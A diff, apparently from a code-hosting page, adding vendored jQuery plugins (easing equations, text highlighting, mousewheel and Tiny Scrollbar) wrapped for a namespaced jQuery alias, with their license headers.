44 |
+
def: 'easeOutQuad',
|
45 |
+
swing: function (x, t, b, c, d) {
|
46 |
+
//alert(jQuery.easing.default);
|
47 |
+
return jQuery.easing[jQuery.easing.def](x, t, b, c, d);
|
48 |
+
},
|
49 |
+
easeInQuad: function (x, t, b, c, d) {
|
50 |
+
return c*(t/=d)*t + b;
|
51 |
+
},
|
52 |
+
easeOutQuad: function (x, t, b, c, d) {
|
53 |
+
return -c *(t/=d)*(t-2) + b;
|
54 |
+
},
|
55 |
+
easeInOutQuad: function (x, t, b, c, d) {
|
56 |
+
if ((t/=d/2) < 1) return c/2*t*t + b;
|
57 |
+
return -c/2 * ((--t)*(t-2) - 1) + b;
|
58 |
+
},
|
59 |
+
easeInCubic: function (x, t, b, c, d) {
|
60 |
+
return c*(t/=d)*t*t + b;
|
61 |
+
},
|
62 |
+
easeOutCubic: function (x, t, b, c, d) {
|
63 |
+
return c*((t=t/d-1)*t*t + 1) + b;
|
64 |
+
},
|
65 |
+
easeInOutCubic: function (x, t, b, c, d) {
|
66 |
+
if ((t/=d/2) < 1) return c/2*t*t*t + b;
|
67 |
+
return c/2*((t-=2)*t*t + 2) + b;
|
68 |
+
},
|
69 |
+
easeInQuart: function (x, t, b, c, d) {
|
70 |
+
return c*(t/=d)*t*t*t + b;
|
71 |
+
},
|
72 |
+
easeOutQuart: function (x, t, b, c, d) {
|
73 |
+
return -c * ((t=t/d-1)*t*t*t - 1) + b;
|
74 |
+
},
|
75 |
+
easeInOutQuart: function (x, t, b, c, d) {
|
76 |
+
if ((t/=d/2) < 1) return c/2*t*t*t*t + b;
|
77 |
+
return -c/2 * ((t-=2)*t*t*t - 2) + b;
|
78 |
+
},
|
79 |
+
easeInQuint: function (x, t, b, c, d) {
|
80 |
+
return c*(t/=d)*t*t*t*t + b;
|
81 |
+
},
|
82 |
+
easeOutQuint: function (x, t, b, c, d) {
|
83 |
+
return c*((t=t/d-1)*t*t*t*t + 1) + b;
|
84 |
+
},
|
85 |
+
easeInOutQuint: function (x, t, b, c, d) {
|
86 |
+
if ((t/=d/2) < 1) return c/2*t*t*t*t*t + b;
|
87 |
+
return c/2*((t-=2)*t*t*t*t + 2) + b;
|
88 |
+
},
|
89 |
+
easeInSine: function (x, t, b, c, d) {
|
90 |
+
return -c * Math.cos(t/d * (Math.PI/2)) + c + b;
|
91 |
+
},
|
92 |
+
easeOutSine: function (x, t, b, c, d) {
|
93 |
+
return c * Math.sin(t/d * (Math.PI/2)) + b;
|
94 |
+
},
|
95 |
+
easeInOutSine: function (x, t, b, c, d) {
|
96 |
+
return -c/2 * (Math.cos(Math.PI*t/d) - 1) + b;
|
97 |
+
},
|
98 |
+
easeInExpo: function (x, t, b, c, d) {
|
99 |
+
return (t==0) ? b : c * Math.pow(2, 10 * (t/d - 1)) + b;
|
100 |
+
},
|
101 |
+
easeOutExpo: function (x, t, b, c, d) {
|
102 |
+
return (t==d) ? b+c : c * (-Math.pow(2, -10 * t/d) + 1) + b;
|
103 |
+
},
|
104 |
+
easeInOutExpo: function (x, t, b, c, d) {
|
105 |
+
if (t==0) return b;
|
106 |
+
if (t==d) return b+c;
|
107 |
+
if ((t/=d/2) < 1) return c/2 * Math.pow(2, 10 * (t - 1)) + b;
|
108 |
+
return c/2 * (-Math.pow(2, -10 * --t) + 2) + b;
|
109 |
+
},
|
110 |
+
easeInCirc: function (x, t, b, c, d) {
|
111 |
+
return -c * (Math.sqrt(1 - (t/=d)*t) - 1) + b;
|
112 |
+
},
|
113 |
+
easeOutCirc: function (x, t, b, c, d) {
|
114 |
+
return c * Math.sqrt(1 - (t=t/d-1)*t) + b;
|
115 |
+
},
|
116 |
+
easeInOutCirc: function (x, t, b, c, d) {
|
117 |
+
if ((t/=d/2) < 1) return -c/2 * (Math.sqrt(1 - t*t) - 1) + b;
|
118 |
+
return c/2 * (Math.sqrt(1 - (t-=2)*t) + 1) + b;
|
119 |
+
},
|
120 |
+
easeInElastic: function (x, t, b, c, d) {
|
121 |
+
var s=1.70158;var p=0;var a=c;
|
122 |
+
if (t==0) return b; if ((t/=d)==1) return b+c; if (!p) p=d*.3;
|
123 |
+
if (a < Math.abs(c)) { a=c; var s=p/4; }
|
124 |
+
else var s = p/(2*Math.PI) * Math.asin (c/a);
|
125 |
+
return -(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b;
|
126 |
+
},
|
127 |
+
easeOutElastic: function (x, t, b, c, d) {
|
128 |
+
var s=1.70158;var p=0;var a=c;
|
129 |
+
if (t==0) return b; if ((t/=d)==1) return b+c; if (!p) p=d*.3;
|
130 |
+
if (a < Math.abs(c)) { a=c; var s=p/4; }
|
131 |
+
else var s = p/(2*Math.PI) * Math.asin (c/a);
|
132 |
+
return a*Math.pow(2,-10*t) * Math.sin( (t*d-s)*(2*Math.PI)/p ) + c + b;
|
133 |
+
},
|
134 |
+
easeInOutElastic: function (x, t, b, c, d) {
|
135 |
+
var s=1.70158;var p=0;var a=c;
|
136 |
+
if (t==0) return b; if ((t/=d/2)==2) return b+c; if (!p) p=d*(.3*1.5);
|
137 |
+
if (a < Math.abs(c)) { a=c; var s=p/4; }
|
138 |
+
else var s = p/(2*Math.PI) * Math.asin (c/a);
|
139 |
+
if (t < 1) return -.5*(a*Math.pow(2,10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )) + b;
|
140 |
+
return a*Math.pow(2,-10*(t-=1)) * Math.sin( (t*d-s)*(2*Math.PI)/p )*.5 + c + b;
|
141 |
+
},
|
142 |
+
easeInBack: function (x, t, b, c, d, s) {
|
143 |
+
if (s == undefined) s = 1.70158;
|
144 |
+
return c*(t/=d)*t*((s+1)*t - s) + b;
|
145 |
+
},
|
146 |
+
easeOutBack: function (x, t, b, c, d, s) {
|
147 |
+
if (s == undefined) s = 1.70158;
|
148 |
+
return c*((t=t/d-1)*t*((s+1)*t + s) + 1) + b;
|
149 |
+
},
|
150 |
+
easeInOutBack: function (x, t, b, c, d, s) {
|
151 |
+
if (s == undefined) s = 1.70158;
|
152 |
+
if ((t/=d/2) < 1) return c/2*(t*t*(((s*=(1.525))+1)*t - s)) + b;
|
153 |
+
return c/2*((t-=2)*t*(((s*=(1.525))+1)*t + s) + 2) + b;
|
154 |
+
},
|
155 |
+
easeInBounce: function (x, t, b, c, d) {
|
156 |
+
return c - jQuery.easing.easeOutBounce (x, d-t, 0, c, d) + b;
|
157 |
+
},
|
158 |
+
easeOutBounce: function (x, t, b, c, d) {
|
159 |
+
if ((t/=d) < (1/2.75)) {
|
160 |
+
return c*(7.5625*t*t) + b;
|
161 |
+
} else if (t < (2/2.75)) {
|
162 |
+
return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b;
|
163 |
+
} else if (t < (2.5/2.75)) {
|
164 |
+
return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b;
|
165 |
+
} else {
|
166 |
+
return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b;
|
167 |
+
}
|
168 |
+
},
|
169 |
+
easeInOutBounce: function (x, t, b, c, d) {
|
170 |
+
if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b;
|
171 |
+
return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b;
|
172 |
+
}
|
173 |
+
});
|
174 |
+
})(asljQuery);
|
175 |
+
/*
|
176 |
+
*
|
177 |
+
* TERMS OF USE - EASING EQUATIONS
|
178 |
+
*
|
179 |
+
* Open source under the BSD License.
|
180 |
+
*
|
181 |
+
* Copyright © 2001 Robert Penner
|
182 |
+
* All rights reserved.
|
183 |
+
*
|
184 |
+
* Redistribution and use in source and binary forms, with or without modification,
|
185 |
+
* are permitted provided that the following conditions are met:
|
186 |
+
*
|
187 |
+
* Redistributions of source code must retain the above copyright notice, this list of
|
188 |
+
* conditions and the following disclaimer.
|
189 |
+
* Redistributions in binary form must reproduce the above copyright notice, this list
|
190 |
+
* of conditions and the following disclaimer in the documentation and/or other materials
|
191 |
+
* provided with the distribution.
|
192 |
+
*
|
193 |
+
* Neither the name of the author nor the names of contributors may be used to endorse
|
194 |
+
* or promote products derived from this software without specific prior written permission.
|
195 |
+
*
|
196 |
+
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY
|
197 |
+
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
|
198 |
+
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
|
199 |
+
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
|
200 |
+
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
|
201 |
+
* GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
|
202 |
+
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
|
203 |
+
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
|
204 |
+
* OF THE POSSIBILITY OF SUCH DAMAGE.
|
205 |
+
*
|
206 |
+
*/
|
js/nomin/jquery.highlight.js
ADDED
@@ -0,0 +1,108 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
* jQuery Highlight plugin
|
3 |
+
*
|
4 |
+
* Based on highlight v3 by Johann Burkard
|
5 |
+
* http://johannburkard.de/blog/programming/javascript/highlight-javascript-text-higlighting-jquery-plugin.html
|
6 |
+
*
|
7 |
+
* Code a little bit refactored and cleaned (in my humble opinion).
|
8 |
+
* Most important changes:
|
9 |
+
* - has an option to highlight only entire words (wordsOnly - false by default),
|
10 |
+
* - has an option to be case sensitive (caseSensitive - false by default)
|
11 |
+
* - highlight element tag and class names can be specified in options
|
12 |
+
*
|
13 |
+
* Usage:
|
14 |
+
* // wrap every occurrance of text 'lorem' in content
|
15 |
+
* // with <span class='highlight'> (default options)
|
16 |
+
* $('#content').highlight('lorem');
|
17 |
+
*
|
18 |
+
* // search for and highlight more terms at once
|
19 |
+
* // so you can save some time on traversing DOM
|
20 |
+
* $('#content').highlight(['lorem', 'ipsum']);
|
21 |
+
* $('#content').highlight('lorem ipsum');
|
22 |
+
*
|
23 |
+
* // search only for entire word 'lorem'
|
24 |
+
* $('#content').highlight('lorem', { wordsOnly: true });
|
25 |
+
*
|
26 |
+
* // don't ignore case during search of term 'lorem'
|
27 |
+
* $('#content').highlight('lorem', { caseSensitive: true });
|
28 |
+
*
|
29 |
+
* // wrap every occurrance of term 'ipsum' in content
|
30 |
+
* // with <em class='important'>
|
31 |
+
* $('#content').highlight('ipsum', { element: 'em', className: 'important' });
|
32 |
+
*
|
33 |
+
* // remove default highlight
|
34 |
+
* $('#content').unhighlight();
|
35 |
+
*
|
36 |
+
* // remove custom highlight
|
37 |
+
* $('#content').unhighlight({ element: 'em', className: 'important' });
|
38 |
+
*
|
39 |
+
*
|
40 |
+
* Copyright (c) 2009 Bartek Szopka
|
41 |
+
*
|
42 |
+
* Licensed under MIT license.
|
43 |
+
*
|
44 |
+
*/
|
45 |
+
(function(jQuery){
|
46 |
+
jQuery.extend({
|
47 |
+
highlight: function (node, re, nodeName, className) {
|
48 |
+
if (node.nodeType === 3) {
|
49 |
+
var match = node.data.match(re);
|
50 |
+
if (match) {
|
51 |
+
var highlight = document.createElement(nodeName || 'span');
|
52 |
+
highlight.className = className || 'highlight';
|
53 |
+
var wordNode = node.splitText(match.index);
|
54 |
+
wordNode.splitText(match[0].length);
|
55 |
+
var wordClone = wordNode.cloneNode(true);
|
56 |
+
highlight.appendChild(wordClone);
|
57 |
+
wordNode.parentNode.replaceChild(highlight, wordNode);
|
58 |
+
return 1; //skip added node in parent
|
59 |
+
}
|
60 |
+
} else if ((node.nodeType === 1 && node.childNodes) && // only element nodes that have children
|
61 |
+
!/(script|style)/i.test(node.tagName) && // ignore script and style nodes
|
62 |
+
!(node.tagName === nodeName.toUpperCase() && node.className === className)) { // skip if already highlighted
|
63 |
+
for (var i = 0; i < node.childNodes.length; i++) {
|
64 |
+
i += jQuery.highlight(node.childNodes[i], re, nodeName, className);
|
65 |
+
}
|
66 |
+
}
|
67 |
+
return 0;
|
68 |
+
}
|
69 |
+
});
|
70 |
+
|
71 |
+
jQuery.fn.unhighlight = function (options) {
|
72 |
+
var settings = { className: 'highlight', element: 'span' };
|
73 |
+
jQuery.extend(settings, options);
|
74 |
+
|
75 |
+
return this.find(settings.element + "." + settings.className).each(function () {
|
76 |
+
var parent = this.parentNode;
|
77 |
+
parent.replaceChild(this.firstChild, this);
|
78 |
+
parent.normalize();
|
79 |
+
}).end();
|
80 |
+
};
|
81 |
+
|
82 |
+
jQuery.fn.highlight = function (words, options) {
|
83 |
+
var settings = { className: 'highlight', element: 'span', caseSensitive: false, wordsOnly: false };
|
84 |
+
jQuery.extend(settings, options);
|
85 |
+
|
86 |
+
if (words.constructor === String) {
|
87 |
+
words = [words];
|
88 |
+
}
|
89 |
+
words = jQuery.grep(words, function(word, i){
|
90 |
+
return word != '';
|
91 |
+
});
|
92 |
+
words = jQuery.map(words, function(word, i) {
|
93 |
+
return word.replace(/[-[\]{}()*+?.,\\^$|#\s]/g, "\\$&");
|
94 |
+
});
|
95 |
+
if (words.length == 0) { return this; };
|
96 |
+
|
97 |
+
var flag = settings.caseSensitive ? "" : "i";
|
98 |
+
var pattern = "(" + words.join("|") + ")";
|
99 |
+
if (settings.wordsOnly) {
|
100 |
+
pattern = "\\b" + pattern + "\\b";
|
101 |
+
}
|
102 |
+
var re = new RegExp(pattern, flag);
|
103 |
+
|
104 |
+
return this.each(function () {
|
105 |
+
jQuery.highlight(this, re, settings.element, settings.className);
|
106 |
+
});
|
107 |
+
};
|
108 |
+
})(asljQuery);
|
js/nomin/jquery.mousewheel.min.js
ADDED
@@ -0,0 +1,12 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*! Copyright (c) 2011 Brandon Aaron (http://brandonaaron.net)
|
2 |
+
* Licensed under the MIT License (LICENSE.txt).
|
3 |
+
*
|
4 |
+
* Thanks to: http://adomas.org/javascript-mouse-wheel/ for some pointers.
|
5 |
+
* Thanks to: Mathias Bank(http://www.mathias-bank.de) for a scope bug fix.
|
6 |
+
* Thanks to: Seamus Leahy for adding deltaX and deltaY
|
7 |
+
*
|
8 |
+
* Version: 3.0.6
|
9 |
+
*
|
10 |
+
* Requires: 1.2.2+
|
11 |
+
*/
|
12 |
+
(function(a){function d(b){var c=b||window.event,d=[].slice.call(arguments,1),e=0,f=!0,g=0,h=0;return b=a.event.fix(c),b.type="mousewheel",c.wheelDelta&&(e=c.wheelDelta/120),c.detail&&(e=-c.detail/3),h=e,c.axis!==undefined&&c.axis===c.HORIZONTAL_AXIS&&(h=0,g=-1*e),c.wheelDeltaY!==undefined&&(h=c.wheelDeltaY/120),c.wheelDeltaX!==undefined&&(g=-1*c.wheelDeltaX/120),d.unshift(b,e,g,h),(a.event.dispatch||a.event.handle).apply(this,d)}var b=["DOMMouseScroll","mousewheel"];if(a.event.fixHooks)for(var c=b.length;c;)a.event.fixHooks[b[--c]]=a.event.mouseHooks;a.event.special.mousewheel={setup:function(){if(this.addEventListener)for(var a=b.length;a;)this.addEventListener(b[--a],d,!1);else this.onmousewheel=d},teardown:function(){if(this.removeEventListener)for(var a=b.length;a;)this.removeEventListener(b[--a],d,!1);else this.onmousewheel=null}},a.fn.extend({mousewheel:function(a){return a?this.bind("mousewheel",a):this.trigger("mousewheel")},unmousewheel:function(a){return this.unbind("mousewheel",a)}})})(asljQuery);
|
js/nomin/jquery.tinyscrollbar.js
ADDED
@@ -0,0 +1,214 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/*
|
2 |
+
* Tiny Scrollbar
|
3 |
+
* http://www.baijs.nl/tinyscrollbar/
|
4 |
+
*
|
5 |
+
* Dual licensed under the MIT or GPL Version 2 licenses.
|
6 |
+
* http://www.opensource.org/licenses/mit-license.php
|
7 |
+
* http://www.opensource.org/licenses/gpl-2.0.php
|
8 |
+
*
|
9 |
+
* Date: 13 / 08 / 2012
|
10 |
+
* @version 1.81
|
11 |
+
* @author Maarten Baijs
|
12 |
+
*
|
13 |
+
*/
|
14 |
+
( function( $ )
|
15 |
+
{
|
16 |
+
|
17 |
+
$.tiny = $.tiny || { };
|
18 |
+
|
19 |
+
$.tiny.scrollbar = {
|
20 |
+
options: {
|
21 |
+
axis : 'y' // vertical or horizontal scrollbar? ( x || y ).
|
22 |
+
, wheel : 40 // how many pixels must the mouswheel scroll at a time.
|
23 |
+
, scroll : true // enable or disable the mousewheel.
|
24 |
+
, lockscroll : true // return scrollwheel to browser if there is no more content.
|
25 |
+
, size : 'auto' // set the size of the scrollbar to auto or a fixed number.
|
26 |
+
, sizethumb : 'auto' // set the size of the thumb to auto or a fixed number.
|
27 |
+
, invertscroll : false // Enable mobile invert style scrolling
|
28 |
+
}
|
29 |
+
};
|
30 |
+
|
31 |
+
$.fn.tinyscrollbar = function( params )
|
32 |
+
{
|
33 |
+
var options = $.extend( {}, $.tiny.scrollbar.options, params );
|
34 |
+
|
35 |
+
this.each( function()
|
36 |
+
{
|
37 |
+
$( this ).data('tsb', new Scrollbar( $( this ), options ) );
|
38 |
+
});
|
39 |
+
|
40 |
+
return this;
|
41 |
+
};
|
42 |
+
|
43 |
+
$.fn.tinyscrollbar_update = function(sScroll)
|
44 |
+
{
|
45 |
+
return $( this ).data( 'tsb' ).update( sScroll );
|
46 |
+
};
|
47 |
+
|
48 |
+
function Scrollbar( root, options )
|
49 |
+
{
|
50 |
+
var oSelf = this
|
51 |
+
, oWrapper = root
|
52 |
+
, oViewport = { obj: $( '.viewport', root ) }
|
53 |
+
, oContent = { obj: $( '.overview', root ) }
|
54 |
+
, oScrollbar = { obj: $( '.scrollbar', root ) }
|
55 |
+
, oTrack = { obj: $( '.track', oScrollbar.obj ) }
|
56 |
+
, oThumb = { obj: $( '.thumb', oScrollbar.obj ) }
|
57 |
+
, sAxis = options.axis === 'x'
|
58 |
+
, sDirection = sAxis ? 'left' : 'top'
|
59 |
+
, sSize = sAxis ? 'Width' : 'Height'
|
60 |
+
, iScroll = 0
|
61 |
+
, iPosition = { start: 0, now: 0 }
|
62 |
+
, iMouse = {}
|
63 |
+
, touchEvents = 'ontouchstart' in document.documentElement
|
64 |
+
;
|
65 |
+
|
66 |
+
function initialize()
|
67 |
+
{
|
68 |
+
oSelf.update();
|
69 |
+
setEvents();
|
70 |
+
|
71 |
+
return oSelf;
|
72 |
+
}
|
73 |
+
|
74 |
+
this.update = function( sScroll )
|
75 |
+
{
|
76 |
+
oViewport[ options.axis ] = oViewport.obj[0][ 'offset'+ sSize ];
|
77 |
+
oContent[ options.axis ] = oContent.obj[0][ 'scroll'+ sSize ];
|
78 |
+
oContent.ratio = oViewport[ options.axis ] / oContent[ options.axis ];
|
79 |
+
|
80 |
+
oScrollbar.obj.toggleClass( 'disable', oContent.ratio >= 1 );
|
81 |
+
|
82 |
+
oTrack[ options.axis ] = options.size === 'auto' ? oViewport[ options.axis ] : options.size;
|
83 |
+
oThumb[ options.axis ] = Math.min( oTrack[ options.axis ], Math.max( 0, ( options.sizethumb === 'auto' ? ( oTrack[ options.axis ] * oContent.ratio ) : options.sizethumb ) ) );
|
84 |
+
|
85 |
+
oScrollbar.ratio = options.sizethumb === 'auto' ? ( oContent[ options.axis ] / oTrack[ options.axis ] ) : ( oContent[ options.axis ] - oViewport[ options.axis ] ) / ( oTrack[ options.axis ] - oThumb[ options.axis ] );
|
86 |
+
|
87 |
+
iScroll = ( sScroll === 'relative' && oContent.ratio <= 1 ) ? Math.min( ( oContent[ options.axis ] - oViewport[ options.axis ] ), Math.max( 0, iScroll )) : 0;
|
88 |
+
iScroll = ( sScroll === 'bottom' && oContent.ratio <= 1 ) ? ( oContent[ options.axis ] - oViewport[ options.axis ] ) : isNaN( parseInt( sScroll, 10 ) ) ? iScroll : parseInt( sScroll, 10 );
|
89 |
+
|
90 |
+
setSize();
|
91 |
+
};
|
92 |
+
|
93 |
+
function setSize()
|
94 |
+
{
|
95 |
+
var sCssSize = sSize.toLowerCase();
|
96 |
+
|
97 |
+
oThumb.obj.css( sDirection, iScroll / oScrollbar.ratio );
|
98 |
+
oContent.obj.css( sDirection, -iScroll );
|
99 |
+
iMouse.start = oThumb.obj.offset()[ sDirection ];
|
100 |
+
|
101 |
+
oScrollbar.obj.css( sCssSize, oTrack[ options.axis ] );
|
102 |
+
oTrack.obj.css( sCssSize, oTrack[ options.axis ] );
|
103 |
+
oThumb.obj.css( sCssSize, oThumb[ options.axis ] );
|
104 |
+
}
|
105 |
+
|
106 |
+
function setEvents()
|
107 |
+
{
|
108 |
+
if( ! touchEvents )
|
109 |
+
{
|
110 |
+
oThumb.obj.bind( 'mousedown', start );
|
111 |
+
oTrack.obj.bind( 'mouseup', drag );
|
112 |
+
}
|
113 |
+
else
|
114 |
+
{
|
115 |
+
oViewport.obj[0].ontouchstart = function( event )
|
116 |
+
{
|
117 |
+
if( 1 === event.touches.length )
|
118 |
+
{
|
119 |
+
start( event.touches[ 0 ] );
|
120 |
+
event.stopPropagation();
|
121 |
+
}
|
122 |
+
};
|
123 |
+
}
|
124 |
+
|
125 |
+
if( options.scroll && window.addEventListener )
|
126 |
+
{
|
127 |
+
oWrapper[0].addEventListener( 'DOMMouseScroll', wheel, false );
|
128 |
+
oWrapper[0].addEventListener( 'mousewheel', wheel, false );
|
129 |
+
}
|
130 |
+
else if( options.scroll )
|
131 |
+
{
|
132 |
+
oWrapper[0].onmousewheel = wheel;
|
133 |
+
}
|
134 |
+
}
|
135 |
+
|
136 |
+
function start( event )
|
137 |
+
{
|
138 |
+
$( "body" ).addClass( "noSelect" );
|
139 |
+
|
140 |
+
var oThumbDir = parseInt( oThumb.obj.css( sDirection ), 10 );
|
141 |
+
iMouse.start = sAxis ? event.pageX : event.pageY;
|
142 |
+
iPosition.start = oThumbDir == 'auto' ? 0 : oThumbDir;
|
143 |
+
|
144 |
+
if( ! touchEvents )
|
145 |
+
{
|
146 |
+
$( document ).bind( 'mousemove', drag );
|
147 |
+
$( document ).bind( 'mouseup', end );
|
148 |
+
oThumb.obj.bind( 'mouseup', end );
|
149 |
+
}
|
150 |
+
else
|
151 |
+
{
|
152 |
+
document.ontouchmove = function( event )
|
153 |
+
{
|
154 |
+
event.preventDefault();
|
155 |
+
drag( event.touches[ 0 ] );
|
156 |
+
};
|
157 |
+
document.ontouchend = end;
|
158 |
+
}
|
159 |
+
}
|
160 |
+
|
161 |
+
function wheel( event )
|
162 |
+
{
|
163 |
+
if( oContent.ratio < 1 )
|
164 |
+
{
|
165 |
+
var oEvent = event || window.event
|
166 |
+
, iDelta = oEvent.wheelDelta ? oEvent.wheelDelta / 120 : -oEvent.detail / 3
|
167 |
+
;
|
168 |
+
|
169 |
+
iScroll -= iDelta * options.wheel;
|
170 |
+
iScroll = Math.min( ( oContent[ options.axis ] - oViewport[ options.axis ] ), Math.max( 0, iScroll ));
|
171 |
+
|
172 |
+
oThumb.obj.css( sDirection, iScroll / oScrollbar.ratio );
|
173 |
+
oContent.obj.css( sDirection, -iScroll );
|
174 |
+
|
175 |
+
if( options.lockscroll || ( iScroll !== ( oContent[ options.axis ] - oViewport[ options.axis ] ) && iScroll !== 0 ) )
|
176 |
+
{
|
177 |
+
oEvent = $.event.fix( oEvent );
|
178 |
+
oEvent.preventDefault();
|
179 |
+
}
|
180 |
+
}
|
181 |
+
}
|
182 |
+
|
183 |
+
function drag( event )
|
184 |
+
{
|
185 |
+
if( oContent.ratio < 1 )
|
186 |
+
{
|
187 |
+
if( options.invertscroll && touchEvents )
|
188 |
+
{
|
189 |
+
iPosition.now = Math.min( ( oTrack[ options.axis ] - oThumb[ options.axis ] ), Math.max( 0, ( iPosition.start + ( iMouse.start - ( sAxis ? event.pageX : event.pageY ) ))));
|
190 |
+
}
|
191 |
+
else
|
192 |
+
{
|
193 |
+
iPosition.now = Math.min( ( oTrack[ options.axis ] - oThumb[ options.axis ] ), Math.max( 0, ( iPosition.start + ( ( sAxis ? event.pageX : event.pageY ) - iMouse.start))));
|
194 |
+
}
|
195 |
+
|
196 |
+
iScroll = iPosition.now * oScrollbar.ratio;
|
197 |
+
oContent.obj.css( sDirection, -iScroll );
|
198 |
+
oThumb.obj.css( sDirection, iPosition.now );
|
199 |
+
}
|
200 |
+
}
|
201 |
+
|
202 |
+
function end()
|
203 |
+
{
|
204 |
+
$( "body" ).removeClass( "noSelect" );
|
205 |
+
$( document ).unbind( 'mousemove', drag );
|
206 |
+
$( document ).unbind( 'mouseup', end );
|
207 |
+
oThumb.obj.unbind( 'mouseup', end );
|
208 |
+
document.ontouchmove = document.ontouchend = null;
|
209 |
+
}
|
210 |
+
|
211 |
+
return initialize();
|
212 |
+
}
|
213 |
+
|
214 |
+
}(asljQuery));
|
js/nomin/jquery.ui.js
ADDED
@@ -0,0 +1,11462 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
